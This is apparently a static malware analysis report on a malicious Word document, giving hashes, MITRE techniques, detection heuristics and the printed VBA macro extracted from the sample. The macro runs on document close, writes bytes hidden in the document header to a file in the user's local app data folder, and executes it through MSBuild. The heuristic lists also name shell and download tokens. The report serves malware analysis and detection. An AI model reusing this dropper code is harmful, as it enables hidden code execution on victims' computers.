Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 153316dd54b30790…

MALICIOUS

Office (OOXML)

17.0 KB Created: 2021-06-16 07:08:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2026-06-04
MD5: a787f8ef0d4ce6b59a538306c60f94da SHA-1: 08ab90023fae0a7b7d7e9557f854852b073866a2 SHA-256: 153316dd54b30790a38dfc900ae860889548376361af8545745acf3aba1bb495
70 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros that execute a function to write a sequence of bytes, likely representing malicious content, to a file named KB84436869.xml in the user's local app data directory. This file is then executed using MSBuild.exe, indicating a downloader or dropper functionality. The use of Environ() to construct paths and the ShellExecuteA API call are indicative of malicious intent.

Heuristics 4

  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        dropPath = Environ("LOCALAPPDATA") & "\KB84436869.xml"
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1868 bytes
SHA-256: 477baed692c0e4f55fc26e9259215dd2c3f4abaadc96ddc7d7c2d696c550224b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Private Declare PtrSafe Function ShellExecuteA Lib "Shell32.dll" _
        (ByVal hwnd As Long, _
        ByVal lpOperation As String, _
        ByVal lpFile As String, _
        ByVal lpParameters As String, _
        ByVal lpDirectory As String, _
        ByVal nShowCmd As Long) As Long


Sub writeOutHeader()
    On Error Resume Next
    Dim intFileNum As Integer
    Dim byteTemp As Byte
    Dim strByte1 As String
    Dim i, j, k As Double
    Dim strIn As String
    Dim blnDone As Boolean
    intFileNum = FreeFile
    Dim dropPath As String
    
    dropPath = Environ("LOCALAPPDATA") & "\KB84436869.xml"

    Open dropPath For Binary As intFileNum

    strIn = ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary).Range.Text
    blnDone = False
    i = 1
    j = 1

    Do While Not blnDone
        k = InStr(i + 1, strIn, ";")
        If k = 0 Then
            blnDone = True
        Else
            blnDone = False
            strByte1 = Mid(strIn, i + 1, k - i - 1)
            ' a = CLng(strByte1)
            Put intFileNum, , CByte(strByte1)
            i = k
            strByte1 = ""
            j = j + 1
            End If
    Loop
    Close intFileNum
End Sub

Sub DoStuff()

Dim retval As Long
retval = ShellExecuteA(0, "open", "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe", Environ("LOCALAPPDATA") & "\KB84436869.xml", "", 0)

End Sub

Private Sub Document_Close()

'#
    writeOutHeader
    DoStuff
End Sub






Attribute VB_Name = "NewMacros"
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 12288 bytes
SHA-256: 5ccbb861602bdbf9282acc3501c17c43f48b723ff27b4bf5b43c6845c221eca0